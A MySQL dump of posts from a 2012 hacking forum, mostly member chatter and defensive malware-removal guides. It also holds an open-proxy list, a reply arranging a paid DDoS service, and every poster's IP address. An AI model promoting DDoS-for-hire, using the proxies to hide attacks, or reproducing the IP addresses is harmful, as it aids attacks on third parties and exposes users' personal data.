'7', 'RE: [Milestone] Reached 700 posts', '0', '1', 't3h jok3r', '1348714097', 'Uhh Yippee congratz my pal :) Thanks for posting and keeping LH up.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0f4d9e9a21328b0bf18e8b154dd0efb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2663', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '82', 'iTzIpod', '1348714252', 'Thanks t3h jok3r :D No problem. Least I could do.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aff77c4dc962290cd9b9c37486a6a3de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2664', '530', '0', '48', 'Link colors', '0', '1', 't3h jok3r', '1348714286', 'Should I change the link colors from green to white?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f1379ec94ff34c944700f61f76e400d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2665', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '82', 'iTzIpod', '1348714344', 'Well I just find it more convenient since if we spam threads in the Off Topic Section, that would just seem weird. And if the A or B Section is there, it would be much more convenient. It\'s not like all the forum sections are active. But we try to make them active.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c592b2131d7f8a5d6b8cbe1a6ce22694', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2666', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '1', 't3h jok3r', '1348714715', 'Well not a bad idea. How about we will add that section when we have a good amount of active posts? Around 10?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b6dbfd3fb48343cc16550cce7f313108', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2667', '531', '0', '4', 'Hello', '0', '199', 'Anonymous™', '1348716475', 'I like to do GFX, Code Java and HTML and Play some PC Games.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '2f826555f398658999130babefb64fa9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2668', '532', '0', '23', 'Think you have an infection? Click Here.', '0', '199', 'Anonymous™', '1348716819', 'Hello if you\'re reading this you\'re most likely infected or think you\'re infected, My name is Anonymous™ and I will try to assist you the best I can. Please follow these steps below. 1. Open up Task Manager and locate the infected process(es) and then kill the process from task manager and then delete the file whitch you located, if your not sure what process looks sketchy or not, Screenshot the whole process list and PM the screenshot. 2. If you\'re not allowed to open up the task manager or simply cannot find the malware process, Open up System Configuration, by typing \"msconfig\" in the search box in the start menu and then press enter or you can open it by typing the same in the Command Prompt (cmd) and then press enter, when the System configuration window appears, go to the Startup Tab and deactivate all the sketchy app\'s from running on startup\'s, and from there you can also locate the malware files and then delete them, or you can go to the location \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" and do the exact same, deleting the shortcut or so, if your not sure what application that is sketchy or not, you can provide us pictures of the \"msconfig >> startup\" tab and the \"startup folder\". 3. If you cannot delete the malware files in normal mode, try booting up in safe mode and try to delete the files from there, if you know the location of the files tho. By booting up in safe mode, restart you\'re computer and enter the boot menu by pressing the default key \"F8\", and select \"safe mode with cmd/internet\" 4. If all of the steps above failed, you can try to remove the malware from you\'re system by running a scan with Superantispyware, Download either the Trial edition or the free edition, doesn\'t matter, after the download is complet, install it and then open up the software, run an update to assure the software is up-to date, then run a full scan and see if it detects the malware, if the scan result comes up as blank, go on to step 5. 5. Other scanners you can try to remove the malware with is, Malwaresbytes, Download the software and install it, then update it to assure it\'s up-to date, and then run a quick scan with it, a full scan is not necessary, the second scanner you can try is ESET Online Scanner, download it and run it, then start a scan with it. The last scanner you could try is the Spybot - Search & Destroy, run it and do a scan with it. 6. If you still think you\'re infected, please post all of you\'er logs here so we can assist you further. -- For Remote Administration Tool (RAT) infections Download Comodo\'s Firewall, The firewall allows you to monitor/block outbound connections and inbound connections. For malware infections with keyhooks (keyloggers) Download KeyScrambler, the software will spoof all the entered keys so the when the author gets the logs it will be displayed.. for an example \"1¨\'-.123fwi&#\"\"ed!\"!DQ\" instead of what you actuall typed, letters/numbers/symbols. For Adwares Most adwares out there often redirect their slaves via the hosts file, also the malicious codes replaces or modifies the hosts file, you can easily spot this my checking the file yourself, Go to the location C:\\Windows\\System32\\drivers\\etc\\\"Hosts\" and right click the \"Hosts\" file and open it in notepad, copy + paste everything and post it here afterwards. For more difficult infections like Rootkits and Bootkits Please download GMER, Do a scan with it, when it completed with it copy the logs from it and PM me them. -- I Hope this helps, and good luck. ~Anonymous™.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '6736cbcb1b30356196f87149b0bdf0be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2669', '533', '0', '23', 'How to Avoid JDB\'s', '0', '199', 'Anonymous™', '1348717325', 'Steps To Avoid Infection: 1]Update Java. Update Java to the latest version as most of the vulnerabilities in the previous versions are fixed in the new release. 2]Use Recognized Browser. Use those Internet Browsers which has Branded Value Like: 1]Mozilla Firefox. 2]Google Chrome. 3]Internet Explorer. 4]Opera. 5]Safari. 3]Turn-OFF Java: I know this can be a disaster since you wont be able to enjoy the internet to full,but to be 100% safe you can use this method. 4]Don’t Trust Obscure Links. 5]Use Sandbox To Browse. [b]NOTE: NEVER check the ”Always trust content from this publisher” as this can be exploited.[/b]', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '99fa153a2ccc818d961b9db214914627', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2670', '534', '0', '23', 'Manually Removing Viruses Through System Registry', '0', '199', 'Anonymous™', '1348719363', 'ABOUT: Now the steps I am about to show you are for experienced PC users only. This involves removing those un-wanted viruses out of your system registry. Now not all viruses show up inside your Registry, but sometimes they like to hide themselves in there. Hope you all enjoy. The following steps involve viewing and optionally editing the Windows registry. Before you do this, you should make a backup of the Windows Registry, so that you can restore it in case you inadvertently delete something that causes your computer to behave unexpectedly. You can backup the registry, by going into Regedit (described in step 1 below), select \'My computer\', click File->Export, then type a file name, then click save. You can also export various branches (sections) of the registry by selecting the particular root folder of the section you would like to export. This generally makes more sense when you are only editing a specific area (as in the steps below). So for this example you might want to simply export the \'Run\' section (described in step 2). WHAT TO DO: 1. The first thing you are going to want to do, is first get into your System Registry, there are a few ways of doing so, but for sake of being easier do the following. Click Start->Run->type regedit->hit enter 2. Now once you are inside your system registry you are going to want to navigate to the correct directory. Browse to: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Basically what you have navigated to, is where certain programs run on startup and viruses love to store themselves there because they are running as soon as you start up your PC. 3. Each item in this area represents a file, which can be seen in the data column, the actual file will end in \'.exe\'. For each file, you can do a search on Google to determine what it is. If you find that it is a virus, you should be able to safely delete the item registry so that it is no longer listed in the registry. You should also delete the actual \'.exe\' file from the file system by browsing to it in Windows Explorer, selecting it, hitting the delete key, and confirm by clicking Yes. 4. Now what you want to do is, Repeat the process above but this time look in: HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run [size=xx-small]IMPORTANT NOTE: [/size] There are a few things you always want to do before deleting files from your computer like performing a complete back up of all of your files, which you should be doing on a regular basis, anyway, and remembering to back up your registry just in case you need it again later. Knowing how to remove a computer virus by hand is vitally important to owning a healthy and lasting computer.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '9edc797a1309b435f0e2cd779b31f0d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2671', '490', '2381', '49', 'RE: Forum Suggestion', '0', '62', 'R?????zo?', '1348729120', 'Personaly I think subforums would be more organized, but you are the boss :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '40a6c094b775676289095a04f0eab7f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2672', '531', '2667', '4', 'RE: Hello', '0', '82', 'iTzIpod', '1348745554', 'Welcome to L33tHacking bro. :D You\'re HQ.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a80e6fcea89ae631c2e94a91ac75303f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2673', '514', '2551', '9', 'RE: How to make serious money', '0', '53', 'sirchamp', '1348746384', 'You can just download the template and send them an email.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'eced35ca682277ba44297df673e28845', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2674', '514', '2616', '9', 'RE: How to make serious money', '0', '82', 'iTzIpod', '1348746820', '[quote=\'p420\' pid=\'2616\' dateline=\'1348679861\'] Nice method but when I click on buy now on the website, it opens the outlook mail program on my PC. [/quote] I don\'t know why it does that. I would love to help but I don\'t know.. If possible, try uninstalling the outlook. (If you want) Or disable it if possible.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '91d1d5c544031c0a3eeec5e42e2743f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2675', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '82', 'iTzIpod', '1348746914', 'We can still get that if we have that section don\'t you agree? [Quote=iTzIpod] This can boost a lot of L33tHacking \'s activity. Because we can make a lot of threads. And a lot of posts this way [/Quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f2aac88c3df9a2cfb57ebcaa9aae335d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2676', '530', '2664', '48', 'RE: Link colors', '0', '82', 'iTzIpod', '1348746945', 'Well I can\'t imagine what it would look like in white. But lets try it out.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6cf258b543b7e5b9ac2624f94cd12eb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2677', '535', '0', '14', 'Proxy list', '0', '199', 'Anonymous™', '1348761020', '[code]1.192.126.252:3128 103.3.221.153:8080 106.1.90.144:8088 109.202.41.38:808 109.234.29.57:3128 111.67.75.99:8081 114.255.193.231:8080 114.80.149.183:80 118.145.11.232:80 119.62.72.202:8080 122.170.3.229:3128 123.128.56.9:8909 123.138.16.82:8080 123.30.128.79:5955 125.37.63.72:8909 125.76.237.68:80 125.96.10.228:8909 140.206.70.110:8888 164.77.196.75:80 164.77.196.78:80 168.187.135.249:8080 176.36.151.85:80 177.69.236.242:80 177.71.189.102:80 180.167.15.242:8080 180.252.181.83:80 180.252.181.84:80 186.201.158.74:80 187.115.25.79:443 187.45.206.144:80 188.124.142.208:8123 190.187.57.130:3128 190.9.128.96:80 193.147.86.249:3128 194.190.33.234:3128 195.138.81.100:3128 195.16.49.214:80 195.5.18.41:8118 198.100.153.94:8118 200.11.138.125:80 200.143.132.102:80 202.116.161.11:808 202.117.120.24:80 202.162.207.10:8080 206.17.82.114:80 208.89.215.230:80 210.184.6.231:80 210.41.98.80:808 211.140.189.247:80 211.232.93.13:808 212.45.5.172:3128 216.244.71.91:8087 217.23.7.193:80 217.24.114.114:3128 218.108.169.104:80 218.108.169.105:80 218.108.169.107:80 218.108.169.108:80 218.108.169.109:80 218.108.169.110:80 218.204.131.250:3128 218.204.73.190:808 218.29.131.11:3128 218.61.18.178:8080 218.94.1.166:82 219.75.27.11:80 221.132.33.135:5955 221.7.25.173:8080 23.20.161.66:80 23.29.112.186:80 41.86.99.22:8080 46.105.20.6:8080 46.164.140.38:3128 46.39.225.33:3128 46.49.81.17:3128 49.212.174.24:80 59.37.168.16:8081 59.66.151.136:8909 60.177.19.17:8909 61.155.95.28:8080 61.172.203.212:8080 61.177.252.38:8080 61.187.186.150:81 61.59.159.187:80 67.23.169.58:143 78.47.5.222:80 84.241.44.251:8080 84.94.130.153:3128 85.92.159.84:8080 86.12.154.1:80 87.236.208.143:808 88.178.107.15:8118 91.121.100.200:8118 93.114.45.122:80 93.189.216.77:3128 93.79.180.141:8080 94.143.43.224:3128 94.23.56.105:80 95.31.23.122:3128 95.80.92.52:3128[/code]', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '7ca85f361ae9b5f0b3a96a42ce092c6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2678', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348772336', 'Okay here are my attemps: [IMG]http://i.imgur.com/BBPGo.gif[/IMG] [IMG]http://i.imgur.com/6dEJ7.gif[/IMG] [IMG]http://i.imgur.com/NhCja.gif[/IMG] [IMG]http://i.imgur.com/WulML.gif[/IMG] [IMG]http://i.imgur.com/vaR2w.gif[/IMG] [IMG]http://i.imgur.com/gdWMV.gif[/IMG]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0c8108872caa4ad328cc239caf8a0290', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2679', '535', '2677', '14', 'RE: Proxy list', '0', '82', 'iTzIpod', '1348773268', 'Nice contribution. Thanks. Will be uploading mine soon. Has about 100k.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '90826f333dd194221ca49f74f59e8e25', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2680', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348773335', 'Thanks for all the entries. I am picking this one [img]http://i.imgur.com/ceRsZ.gif[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'de0f6dfe0c227594c8d2b4d5d982fe12', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2681', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348779668', 'Updated the Unique Userbar. Also, changed the Requirements.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '761b406d3512fb46ecd1ea6d8feed6c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2682', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348784251', 'I think thats the best too :) glad you like it.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a65c8f6ff4ccf82da2f5c45bbf70a164', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2683', '531', '2667', '4', 'RE: Hello', '0', '1', 't3h jok3r', '1348788438', 'Welcome to L33THacking. I like your signature', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '873ff6f1143a31843a20110e1f03848c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2684', '530', '2664', '48', 'RE: Link colors', '0', '1', 't3h jok3r', '1348788888', 'Alright I will check it out then post a screenshot of before and after', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '07494dcecdda3cd4042f190657a56f47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2685', '529', '2675', '49', 'RE: [Suggestion] A or B Section', '0', '1', 't3h jok3r', '1348793041', '[quote=\'iTzIpod\' pid=\'2675\' dateline=\'1348746914\'] We can still get that if we have that section don\'t you agree? [Quote=iTzIpod] This can boost a lot of L33tHacking \'s activity. Because we can make a lot of threads. And a lot of posts this way [/Quote] [/quote] Lets wait for a second opinion. Hopefully NXK, Apathy or someone checks this out.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7f778d900150e122d2afe3f438640655', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2686', '536', '0', '4', 'Hey everyone!', '0', '200', 'Poptart', '1348794230', 'I\'m new to L33tHacking.net I love using photoshop. Even though I\'m bad at it. I don\'t really got any \"talents\" or whatever you call it. I don\'t know how to DDoS or hack. I just came here for fun. Might plan on being active who knows?', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '45777b73d608d4e08497c410664a4e81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2687', '526', '2637', '3', 'RE: New Smilies', '0', '200', 'Poptart', '1348794406', 'I like the new smilies. I just registered so I don\'t know what the old ones were. But oh well. These ones look very cool :D', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', 'f9fcdd8819cd0330f931ed58f2133b61', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2688', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '200', 'Poptart', '1348794616', 'I think this is a great idea to boost forum activity.', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', 'e599f1b5ff68f44dcf2881e579eb1528', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2689', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '200', 'Poptart', '1348794685', 'This group seems very HQ and Unique. Hope they become successful! :D I hope I can be in this group. Looks very decent. Good luck with the group iTzIpod! Also, nice Userbar.', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '3568cc6b8b5ea26db920a8fb1e4b2afd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2690', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '200', 'Poptart', '1348794760', 'Woah. That\'s really interesting. I want to meet this man in real life. He seems like a good role model. (Not really but like he did something very interesting) :p', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '2a63dcea4ab5f83b3610ac3b619a0418', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2691', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '200', 'Poptart', '1348794793', 'Congratulations iTzIpod on 700+ post! :D Your contribution to L33tHacking has improved it a lot.', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', 'fa6bcf5e9752b61c47e8d55dbf72ce45', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2692', '514', '2551', '9', 'RE: How to make serious money', '0', '200', 'Poptart', '1348794835', 'Very nice guide and tutorial. Thanks for the share.', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '02548468311cd2242f1ea2cee5edff53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2715', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '100', '??zg???g????61', '1348797243', 'Hey sorry !!! I was on vacation. I\'ll get you your vouch copy now. Message me again with the URL of the site.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', 'bbe2edc990fcdbd5f0b2dc42e2a13c01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2694', '536', '2686', '4', 'RE: Hey everyone!', '0', '61', 'NXK', '1348794870', 'You\'ll learn one day, Just be motivated. Welcome to LH and I hope you stay active.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd67d1b2152da2ae1ea39ec8c57d68f43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2695', '536', '2686', '4', 'RE: Hey everyone!', '0', '200', 'Poptart', '1348794936', 'Thank you NXK :D I\'ll try to stay active!', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '07283dc6af43efb90d95826a88a8bf3c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2696', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '200', 'Poptart', '1348794997', 'That looks really good. The first one for sure. Could possibly be better if it was animated and looked like he was jumping around the userbar collecting coins? :p', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', 'ab9a52f5c2e089e8a71afa86377ed761', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2697', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '200', 'Poptart', '1348795062', 'Woah. That is so good. I can\'t make that :( I wanna learn to make something like that. 10/10 :D', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '187e909685faba6c546b4dd6414a3e00', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2698', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '200', 'Poptart', '1348795092', 'I have Photoshop CS6 Extended. It takes up a lot of space but it\'s worth it.', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '4493433192a40bf9b1e32023c330004b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2699', '257', '1141', '35', 'RE: Nice Video Edit', '0', '200', 'Poptart', '1348795124', 'That first clip, is sexy. :o Going to subscribe! :D', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '6ce820aeeb4a9aab55a0c90af91d7dd2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2700', '529', '2688', '49', 'RE: [Suggestion] A or B Section', '0', '1', 't3h jok3r', '1348795226', '[quote=\'Poptart\' pid=\'2688\' dateline=\'1348794616\'] I think this is a great idea to boost forum activity. [/quote] Thanks for your opinion but lets wait for more opinions :)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd011fe036e530b8308f3048dc2b40720', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2701', '536', '2686', '4', 'RE: Hey everyone!', '0', '199', 'Anonymous™', '1348795248', 'Welcome to L33thacking.net Poptart!', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '40c01fde090fc7ccecd558d5ac94f4bd', '0', '0'); INSERT INTO 